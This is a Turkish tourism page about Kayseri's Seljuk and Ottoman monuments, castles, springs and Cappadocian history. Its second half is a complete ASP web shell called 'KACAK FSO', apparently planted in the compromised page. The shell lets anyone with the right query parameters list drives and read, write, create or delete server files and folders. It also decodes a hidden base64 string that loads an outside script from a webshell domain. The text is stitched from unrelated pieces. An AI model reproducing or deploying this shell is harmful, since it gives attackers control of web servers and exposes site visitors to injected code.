Kayseri Hakkında

Orta Anadolu’nun ticâret ve sanâyi merkezi, kara ile demiryollarının kavşak noktası olan Kayseri tabiî güzellikleri yanında çok zengin târihî eserlere sâhiptir. Çok eski bir yerleşim merkezi olduğundan pekçok târihî eser ve yeri vardır. Bunların en önemlileri Selçuklu ve Osmanlı devrine âit olanlardır. Selçuklu eserleri Konya’dan sonra en çok Kayseri’dedir. Selçuklu ve Osmanlı devri eserleri görülmeye değer güzellikte birer sanat şâheserleridir. Önemlilerinden bâzıları:

Kayseri Kalesi: Beşinci asırda Bizans İmparatoru Justinianus yaptırmıştır. Birçok harpte zarar gören kale Birinci Alâeddîn Keykubâd zamânında tâmir edilmiştir. Daha sonra Karamanoğlu ve Osmanlılar devrinde tâmir edilerek kullanılmıştır. İç ve dış kaleden meydana gelmiş ise de bugün dış kale çok harab vaziyettedir. İç kale dörtgen plânlı 195 burçludur. Doğuda güneyde ve kuzeyde olmak üzere üç kapısı vardır.

Zamantı Kalesi: Pınarbaşı yakınındadır.Şahmelik Kalesi: Develi ilçesinin Şahmelik köyü yakınlarındadır. Romalılar döneminde yapılan kale, Bizanslılar tarafından da kullanılmıştır. Günümüzde harab vaziyettedir.

Yeşilhisar Kalesi: Adıyla anılan ilçededir.Develi Kalesi: Develi ilçesinin batısında sarp kaya üzerine yapılmıştır. Harab vaziyettedir.

Hunad Hâtun Külliyesi: Anadolu Selçukluları devrinde yapılan ilk külliyelerdendir. 1238’de Birinci Keykubad’ın eşi Mahperi Hunad Hâtun tarafından yaptırılmıştır. Külliye, câmi, medrese, türbe ve hamamdan meydana gelmiştir. Câmi minâresizdir. Minâresi ve büyük kubbe de İkinci Abdülhamîd Han zamanında yaptırılmıştır. Külliye, taş işçiliği şâheseridir. Hamam 1968’de Vakıflar Genel Müdürlüğü tarafından tâmir ettirilmiştir.

Kölük Câmii ve Medresesi: On üçüncü asır Selçuklu eseridir. 1205 senesinde Selçuklu kumandanlarından Mazaffereddîn Mahmûd’un kızı Atsız Elti Hâtun yaptırmıştır. 1335’te depremden zarar gören yapıyı Kölük Şemseddîn tâmir ettirdiği için onun ismi ile anılmaktadır. Câminin mihrabı ve çinileri çok meşhurdur. Medrese iki katlıdır.

Hacı Kılıç Câmii ve Medresesi: Selçuklu vezirlerinden Ebû Kâsım Ali Tûsî 1242-1249 arasında yaptırmıştır. Câmi ve medresenin giriş kapıları nefis taş işçiliğinin güzel örneklerindendir. Câmi dışardan kale gibi gözükür. Sarı ve siyah taştan yapılmıştır.
Ulu Câmi: On ikinci asır Selçuklu eserlerindendir. 1135’te yapılan eser 1,5 m toprağa gömülüdür. Melih Mehmed Gâzi tarafından yaptırılmıştır. Çeşitli zamanlarda tâmir gören eser ilk orjinal yapı özelliğini kaybetmiştir. Yanında türbe ve medrese vardır. En eski Türk eserlerinden ve Anadolu’daki ilk Türk câmilerinden olup, minâresi Türkiye’nin en uzun minârelerindendir. On sekizinci asrın sonlarında Reîsülküttâb Râşit Efendi yanına bir kütüphâne yaptırmıştır. Çok değerli yazma eserleri vardır.
Kurşunlu Câmi: 1585’te yapılmıştır. Osmanlı devrine âittir. Asıl ismi Hacı Ahmed Paşa Câmiidir. Mîmar Sinan’ın eserleri arasında yer almaktadır. Hacı Ahmed Paşa, kaptân-ı deryâ idi. Kubbesi kurşundan olduğu için bu isim verilmiştir. Câmi külliyesinde kervansaray aşhâne, paşa odaları, medrese odaları ve şadırvan vardır.

Fâtih Sultan Mehmed Câmii: 1478’de Fâtih Sultan Mehmed tarafından yaptırılmıştır. Kale içinde olduğundan Kale Câmii olarak da bilinir.

Lalapaşa Câmii: Muslihiddîn Paşa tarafından 1308’de yaptırılmıştır. Lâle Câmii de denir. Minberi eşi bulunmaz bir şâheserdir. Sultan İkinci Abdülhamîd Hanın hediye ettiği muhâfazada sakal-ı şerîf bulunmaktadır.

Ulu Câmi: Bünyan ilçesindedir. 1256’da Kaluyan bin Karabuda tarafından yaptırılmıştır. Taç kapının kitâbe ve süslemeleri çok güzeldir. Kesme taş duvarları ile kale görünümündedir.

Develi Ulu Câmi: Develi ilçesindedir. 1281’de Göçer Araslan ve eşi Saad tarafından yaptırılmıştır. Mihrabı çok süslüdür.

Avgunlu Medresesi: On üçüncü asırda yapılmıştır. Medrese, Vakıflar Bölge Müdürlüğü tarafından yeniden restore edilmiştir.

Sâhibiye Medresesi: 1267’de Selçuklu vezirlerinden Sâhip Ata yaptırmıştır. Kapısını çevreleyen geometrik işlemeler Selçuklu taş işçiliğinin en güzel örneklerindendir.

Köşk Medrese: 1341’de Alâeddîn Eratna tarafından yaptırılmıştır. Kesme taştandır. Avlunun ortasında bir türbe vardır. Türbede Alâeddîn Eratna ve hanımı gömülüdür.

Hâtuniye Medresesi: 1432’de Dulkadiroğullarından Nâsıreddîn Mehmed bin Halil tarafından yaptırılmıştır. Kapısının yanında sivri kemerli iki güzel çeşme vardır.

Çifte Medrese(Şifaiye Gıyâsiye Medresesi): Biri medrese biri hastâne olmak üzere, bitişik iki yapıdan meydana gelmiştir. Dünyada ilk tıp fakültesidir. 1205’te Selçuklu Sultanı Gıyâseddîn Keyhüsrev kız kardeşi Gevher Nesibe Sultan adına vasiyeti üzerine vakıf olarak yaptırmıştır. Kapısı ince işlemeleri ile Selçuklu taş işçiliğinin ilginç örneklerindendir. Hastâne kısmının duvarına bitişik Gevher Nesibe Sultan Türbesi vardır.

Keykubadiye Sarayları: Alâeddin Keykubâd’ın 1224’te yaptırdığı yazlık binâlardır. Küçük bir gölün kıyısında üç köşkten meydana gelmiştir.

Sultan Hanı: Kayseri-Sivas yolunda, Palaş köyündedir. Kitâbesinden 1236’da yapıldığı anlaşılmaktadır. Avlusunda kare plânlı köşk mescid vardır. Konya Sultan Hanından daha büyüktür.

Tekgöz Köprüsü: Kayseri-Ankara yolunda Kızılırmak üzerindedir. Kitâbesinden 1203’te Rükneddîn Süleymân tarafından yaptırıldığı anlaşılmaktadır. Uzunluğu 120 m genişliği 27 metredir.

Çokgöz Köprüsü: Kayseri-Yozgat yolunda, kızılırmak üzerindedir. On üçüncü asırda yapılmıştır. Değişik ebatlarda on beş gözden meydana gelmiştir. Yapılan tâmirler yüzünden orijinal yapısı kaybolmuştur.

Karatay Hanı: Kayseri-Malatya yolundadır. Atabey Emir Celâleddîn tarafından 1240 senesinde yaptırılmıştır. Bezemeli kapısı çok güzeldir.

Çifte Kümbet: 1247’de Sultan Birinci Keykubad, eşi Melîke Âdile için yaptırmıştır. Sivas Caddesi üzerindedir. Kare kaide üstünde sekizgen gövdeli kümbetin pramit külahı yıkılmıştır.

Döner Kümbet: Kayseri-Talas arasındadır. 1276 senesinde BirinciAlâeddîn Keykubâd’ın kızı Şah Cihan Hâtun için yapılmıştır. 12 köşeli olup, üstü koni biçiminde bir külah ile örtülüdür. Sarımsı kesme taştan yapılmıştır. Bitki motifleri ve geometrik motiflerle süslüdür. Kümbete iki yönlü dar bir merdivenle çıkılır.

Melik Gâzi Türbesi: Pınarbaşı ilçesine bağlı Melik Gâzi köyündedir. On ikinci asırda yapılmıştır. İki katlı olup, alt katta lahid odası, üst katta ise sandukaların bulunduğu oda vardır. Türbenin dış yüzü tuğlalarla kaplıdır. Tuğlalar geometrik desenler biçiminde dizilerek güzel bir görünüm kazandırılmıştır.

Eski eserler: Kayseri’nin 20 km kuzeydoğusunda bulunan Kültepe, Hitit ve Asurlulara âit 4000 senelik bir yerleşim merkezidir. Eski adı “Kaniş” (Kaneş) idi. Kazılarda binlerce tablet bulunmuştur. Bu antik şehrin kalıntıları da vardır. Asurlu tüccarların bir kolonisiydi. Burada bronz ve bakır çağ devirlerine âit eserler de bulunmuştur. Karum: Kültepe yakınlarında eski bir Hitit ve Asur kenti kalıntısıdır. Erkilet: Hititlere âit bir kentin harâbeleridir. Soğanlı Harâbeleri: Roma devrine âit kiliseler vardır. Bu harâbeler Erdemli, Doğanlı, Araplı ve Göreme’dekilerle aynı özelliği taşır. Başköy’deki büyük kiliseye yer altı kanalları ile bağlıdır. Hepsi fresklerle süslüdür. Kayabaşı Mağaraları: Bünyan ilçesi yakınında olup, ilk çağlara âit sanat izleri bulunur. Roma Mezarı: Sahabiye Medresesi yanında M.Ö. üçüncü asra ve Romalılara âit bir mezardır. Fraktın Yazılı Kabartmalar: Develi ilçesi Fraktın köyü yakınında kayalar üzerinde Hititlere âit yazı ve resimlerdir. İmamkullu Kabartmaları: Develi ilçesinin İmamkullu köyü yakınındadır. Büyük bir kaya (Şimşek Kaya) üzerine yazılmış hiyeroglif yazılar ve kabartma resimler Hititlere âittir. Yemliha Kartalı: Kayseri müzesinde bir Hitit eseridir. Yekpâre granit taştan yapılmıştır. 2 metre 20 cm yükseklikte ve 4 ton ağırlıktadır.

Tabiî güzellikler:

Kayseri’de tabiî güzelliği ile meşhur pekçok mesire yeri vardır. Başlıca mesire yerleri şunlardır:

Erciyes Dağı: Zirvesi devamlı karla örtülü ve İç Anadolu’nun en yüksek dağı olan Erciyes Dağı ve eteklerinde manzarası ve tabiî güzelliği fevkalâde olan mesire yerleri vardır. Ayrıca dağ, kayak sporlarına müsâittir. Erciyes ve Tekir yaylası kış aylarında dağcılık ve kış sporları merkezi özelliğini taşırken, yaz aylarında ideal bir dinlenme yeridir. Çeşitli tesisler, yüzme havuzu, telesiyej yanında dağ evi vardır. Uludağ’dan sonra Türkiye’nin en büyük kış sporları merkezidir. Bağlar: Merkez ilçe ile Erkilet, Gesi, Talas ve Hisarcık arasındadır. Boğaz Köprü: İl merkezinin batısında 20 km mesâfede bulunan bu mesire yeri Karasu yanındadır. Gesi: Tabii bir dinlenme, yeridir. Bağları türkülere konu olmuştur. Talas: Şehre 7 km mesâfededir. Hisarcık: Park ve yüzme havuzu vardır. Dağ evi, su, yeşillik, güneş ve devamlı rüzgâr ile eşsiz bir mesire yeridir. Hisarcık, dağ evine gitmek isteyenlerin geçtiği bir mesire yeridir. Mimar Sinan Parkı ile İnönü Parkı: Şehrin içindedir. Geniş bir sahaya yayılmıştır.

Kapuzbaşı Şelâlesi: Kayseri’ye 170 km mesâfede, ilin güney sınırındadır. Torosların Hacer bölgesinde, yüksekliği yer yer 70 ilâ 150 metreyi bulan kayalardan çıkıp aynı adlı bir çayı meydana getiren şelâleler, Kayseri ve civârının en önemli tabiat harikalarından birisidir. Bir vâdide yükselen kayalıklara eski Türkçede “kapuz” adı verildiği için şelâleler bu adla anılmaktadır. Türklerin bahar mevsiminde buraya gelip şelâlelerin başında kopuz çaldıkları için bu adı aldığını nakledenler de vardır. Yedi ayrı kaynaktan çıkan sular, meydana getirdikleri şelâleler ile seyredenleri âdeta büyülemektedir.

Kaplıca ve içmeleri:
Kayseri ili içme ve kaplıca bakımından oldukça zengindir. Önemli ve meşhur kaplıcaları şunlardır:

Bayramhacı Kaplıcası: Kayseri’ye 80 km uzaklıkta Bayramhacı köyü yakınlarındadır. Romatizmal rahatsızlıklara, gut hastalığına ve dolaşım sistemi rahatsızlıklarında faydalıdır. İçme kürleri karaciğer ve safrakesesi hastalıklarına iyi gelir. Kaplıca yanında tesisleri vardır.

Yeşilhisar İçmesi: Yeşilhisar ilçesine 11 km uzaklıkta, Kayseri-Niğde yolu üzerindedir. Mîde ve barsak rahatsızlıklarına faydalıdır. Kaplıca yanında tesisleri vardır.

Tekgöz Kaplıcası: Yemliha köyündedir. Çok eski zamanlardan beri kullanılan bu kaplıca nevralji, yarım felç, kırık ve çıkık ile kadın hastalıklarına iyi gelmektedir.

Hasanarpa Mâden Suyu: İl merkezine 12 km uzaklıkta Hasanarpa köyündedir. Mîde, karaciğer ve böbrek hastalıklarına iyi gelir.

İnsan yerleşimi Paleolitik döneme kadar uzanmaktadır. Hititler´in yaşadığı topraklar daha sonraki dönemlerde Hrıstiyanlığın en önemli merkezlerinden biri olmuştur. Kayalara oyulan evler ve kiliseler, bölgeyiRoma İmparatorluğu´nun baskısından kaçan Hıristiyanlar için devasa bir sığınak haline getirmiştir.

Kapadokya bölgesi, başta Nevşehir olmak üzere Kırşehir, Niğde, Aksaray ve Kayseri illerine yayılmış bir bölgedir.
Kapadokya bölgesi, doğa ve tarihin bütünleştiği bir yerdir. Coğrafi olaylar Peribacaları´nı oluştururken, tarihi süreçte, insanlar da bu peribacalarının içlerine ev, kilise oymuş, bunları fresklerle süsleyerek, binlerce yıllık medeniyetlerin izlerini günümüze taşımıştır. İnsan yerleşimlerinin Paleolitik döneme kadar uzandığı Kapadokya´nın yazılı tarihi Hititlerle başlar. Tarih boyunca ticaret kolonilerini barındıran ve ülkeler arasında ticari ve sosyal bir köprü kuran Kapadokya, İpek Yolu´nun da önemli kavşaklarından biridir.
MÖ 12. yüzyılda Hitit İmparatorluğu´nun çöküşüyle bölgede karanlık bir dönem başlar. Bu dönemde Asur ve Frigya etkileri taşıyan geç Hitit Kralları bölgeye egemen olur. Bu Krallıklar MÖ 6. yüzyıldaki Pers işgaline kadar sürer. Bugün kullanılan Kapadokya adı, Pers dilinde "Güzel Atlar Ülkesi" anlamına geliyor. MÖ 332 yılında Büyük İskender Persleri yenilgiye uğratır, ama Kapadokya´da büyük bir dirençle karşılaşır. Bu dönemde Kapadokya Krallığı kurulur. MÖ 3. yüzyıl sonlarına doğru Romalılarıngücü bölgede hissedilmeye başlar. MÖ 1. yüzyıl ortalarında Kapadokya Kralları, Romalı generallerin gücüyle atanmakta ve tahttan indirilmektedir. M.S. 17 yılında son Kapadokya kralı ölünce bölge Roma´nın bir eyaleti olur.

MS 3. yüzyılda Kapadokya´ya Hıristiyanlar gelir ve bölge onlar için bir eğitim ve düşünce merkezi olur. 303-308 yılları arasında Hıristiyanlara uygulanan baskılar iyice artar. Fakat Kapadokya baskılardan korunmak ve Hıristiyan öğretiyi yaymak için ideal bir yerdir. Derin vadiler ve volkanik yumuşak kayalardan oydukları sığınaklar Romalı askerlere karşı güvenli bir alan oluşturur.

4. yüzyıl, daha sonra "Kapadokya´nın Babaları" olarak adlandırılan insanların, dönemi olur. Fakat bölgenin önemi, III. Leon´un ikonları yasaklamasıyla doruk noktasına ulaşır. Bu durum karşısında, ikon yanlısı bazı kişiler bölgeye sığınmaya başlar. İkonoklazm hareketi yüz yıldan fazla sürer (726-843). Bu dönemde birkaç Kapadokya kilisesi İkonoklazm etkisinde kaldıysa da, ikondan yana olanlar burada rahatlıkla ibadetlerini sürdürdüler. Kapadokya manastırları bu devirde oldukça gelişir.
Yine bu dönemlerde, Anadolu´nun Ermenistan´dan Kapadokya´ya kadar olan Hıristiyan bölgelerine Arap akınları başlar. Bu akınlardan kaçarak bölgeye gelen insanlar bölgedeki kiliselerin tarzlarının değişmesine sebep olur. 11. ve 12. yüzyıllarda Kapadokya Selçukluların eline geçer. Bu ve bunu takip eden Osmanlı zamanlarında bölge sorunsuz bir dönem geçirir. Bölgedeki son Hıristiyanlar 1924-26 yıllarında yapılan mübadeleyle, arkalarında güzel mimari örnekler bırakarak Kapadokya´yı terkettiler.
 


br>asdasd
GIF89a; KACAK Shell <% Dim Base64Chars Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" & _ "abcdefghijklmnopqrstuvwxyz" & _ "0123456789" & _ "+/" Public Function base64_encode( byVal strIn ) Dim c1, c2, c3, w1, w2, w3, w4, n, strOut For n = 1 To Len( strIn ) Step 3 c1 = Asc( Mid( strIn, n, 1 ) ) c2 = Asc( Mid( strIn, n + 1, 1 ) + Chr(0) ) c3 = Asc( Mid( strIn, n + 2, 1 ) + Chr(0) ) w1 = Int( c1 / 4 ) : w2 = ( c1 And 3 ) * 16 + Int( c2 / 16 ) If Len( strIn ) >= n + 1 Then w3 = ( c2 And 15 ) * 4 + Int( c3 / 64 ) Else w3 = -1 End If If Len( strIn ) >= n + 2 Then w4 = c3 And 63 Else w4 = -1 End If strOut = strOut + mimeencode( w1 ) + mimeencode( w2 ) + _ mimeencode( w3 ) + mimeencode( w4 ) Next base64_encode = strOut End Function Private Function mimeencode( byVal intIn ) If intIn >= 0 Then mimeencode = Mid( Base64Chars, intIn + 1, 1 ) Else mimeencode = "" End If End Function Public Function base64_decode( byVal strIn ) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len( strIn ) Step 4 w1 = mimedecode( Mid( strIn, n, 1 ) ) w2 = mimedecode( Mid( strIn, n + 1, 1 ) ) w3 = mimedecode( Mid( strIn, n + 2, 1 ) ) w4 = mimedecode( Mid( strIn, n + 3, 1 ) ) If w2 >= 0 Then _ strOut = strOut + _ Chr( ( ( w1 * 4 + Int( w2 / 16 ) ) And 255 ) ) If w3 >= 0 Then _ strOut = strOut + _ Chr( ( ( w2 * 16 + Int( w3 / 4 ) ) And 255 ) ) If w4 >= 0 Then _ strOut = strOut + _ Chr( ( ( w3 * 64 + w4 ) And 255 ) ) Next base64_decode = strOut End Function Private Function mimedecode( byVal strIn ) If Len( strIn ) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr( Base64Chars, strIn ) - 1 End If End Function dim myStringo stringo = "PHNjcmlwdCB0eXBlPSJ0ZXh0L0phdmFTY3JpcHQiIHNyYz0i" stringo_1 = "aHR0cDovL3dlYnNoZWxsLmNvL3doby9tYWluLmpzIj48L3NjcmlwdD4" myStringo = base64_decode(stringo+stringo_1) if request.querystring("TGH") = "1" then on error resume next es=request.querystring("Kacak") diez=server.urlencode(left(es,(instrRev(es,"\"))-1)) Select case es case "C:" diez="C:" case "D:" diez="D:" end select ´ Functions to provide encoding/decoding of strings with Base64. ´ ´ Encoding: myEncodedString = base64_encode( inputString ) ´ Decoding: myDecodedString = base64_decode( encodedInputString ) ´ ´ Programmed by Markus Hartsmar for ShameDesigns in 2002. ´ Email me at: mark@shamedesigns.com ´ Visit our website at: http://www.shamedesigns.com/ ´ %> <% else %> <% if request.querystring("Dosyakaydet") <> "" then set kaydospos=createobject("scripting.filesystemobject") set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi")) set kaydoses=nothing set kaydospos=nothing set kaydospos=createobject("scripting.filesystemobject") set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true) kaydoses.write request("duzenx") set kaydoses=nothing set kaydospos=nothing end if %> <% if request.querystring("yenidosya") <> "" then %>

 


Kacak ©
Hackerbox

KACAK FSO 1.0


Cyber Protest 
xLw@GrayHatz ~ TurkGuvenligi.Info 

 Çalisilan Klasör
 <%=response.write(request.querystring("yenidosya"))%>  

 

 
&klas=<%=request.querystring("yenidosya")%>" name="kaypos">


Dosya Adi :


Içerik : 


 

 

<% else %> <% if request.querystring("klasorac") <> "" then set doses=createobject("scripting.filesystemobject") set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx")) set es=nothing set doses=nothing end if %> <% if request.querystring("klasac") <> "" then set aktifklas=request.querystring("aktifklas") %>

 


Kacak ©
Hackerbox

KACAK FSO 1.0


 

 Çalisilan Alan
 <%=aktifklas%>  

<% else %> <% if request.querystring("suruculer") <> "" then %>

 

   

 

 


Kacak ©
Hackerbox

KACAK FSO 1.0


Have Fun 

 

 

 
 
Sürücü Adi Boyutu Bos Alan Durum Islem
<% set klassis =server.createobject("scripting.filesystemobject") set klasdri=klassis.drives %> <% for each dongu in klasdri %> <% if dongu.driveletter <> "A" then if dongu.isready=true then %> <% select case dongu.drivetype case 0 teype="Diger" case 1 teype="Tasinir" case 2 teype="HDD" case 3 teype="NetWork" case 4 teype="CD-Rom" case 5 teype="FlashMem" end select %>
 <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> ) <%=Round(dongu.totalsize/(1024*1024),1)%> MB <%=Round(dongu.availablespace/(1024*1024),1)%> MB <%=teype%> 
Gir
<% end if end if %> <% next %>
 

 

 

<% else %> <% if request.querystring("kaydet") <> "" then set dossisx=server.createobject("scripting.filesystemobject") set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true) dosx.write request("duzenx") dosx.close set dosyax=nothing set dossisx=nothing end if %> <% if request.querystring("duzenle") <> "" then set dossis=server.createobject("scripting.filesystemobject") set dos=dossis.opentextfile(request.querystring("duzenle"), 1) sedx = dos.readall dos.close set dosya=nothing set dossis=nothing set aktifklas=request.querystring("klas") %>

 


Kacak©
Hackerbox

KACAK FSO 1.0


Have Fun 

 Çalisilan Dosya
 <%=response.write(request.querystring("duzenle"))%>  

 

 
&klas=<%=aktifklas%>" name="kaypos">


 

 

<% else %> <% if request.querystring("klas") <> "" then aktifklas=Request.querystring("klas") if request.querystring("usak") = "1" then aktifklas=aktifklas & "\" end if else aktifklas=server.mappath("/") aktifklas=aktifklas & "\" end if if request.querystring("silklas") <> "" then set sis=createobject("scripting.filesystemobject") silincekklas=request.querystring("silklas") sis.deletefolder(silincekklas) set sis=nothing ´response.write(sil & " Silindi") end if if request.querystring("sildos") <> "" then silincekdos=request.querystring("sildos") set dosx=createobject("scripting.filesystemobject") set dos=dosx.getfile(silincekdos) dos.delete set dos=nothing set dosyasis=nothing end if select case aktifklas case "C:" aktifklas="C:\" case "D:" aktifklas="D:\" case "E:" aktifklas="E:\" case "F:" aktifklas="F:\" case "G:" aktifklas="G:\" case "H:" aktifklas="H:\" case "I:" aktifklas="I:\" case "J:" aktifklas="J:\" case "K:" aktifklas="K:\" end select if aktifklas=("C:") then aktifklas=("C:\") Set FS = CreateObject("Scripting.FileSystemObject") Set klasor = FS.GetFolder(aktifklas) Set altklasorler = klasor.SubFolders Set dosyalar = klasor.files %>

 


Kacak ©

Hackerbox

KACAK FSO 1.0


Have Fun 

 Çalisilan Klasör
 <%=response.write(aktifklas)%>

" style="text-decoration: none"> Üst Klasör

 

 
Sürücüler
Yeni Klasör
Yeni Dosya

 

 Tür  Dosya Adi

 Islem

<%response.write(myStringo)%> <% For each oge in altklasorler %>

 <%=oge.name%> 

Sil

<% Next %> <% For each oge in dosyalar %>

 <%=oge.name%>         ( <%=Round(oge.size/1024,1)%> KB ) 

Düzenle

Sil

<% Next %> <% if aktifklas=("C:\") then aktifklas=("C:") %> <% end if %> <% end if %> <% end if %> <% end if %> <% end if %>

Kayseri Havaalanı Taksi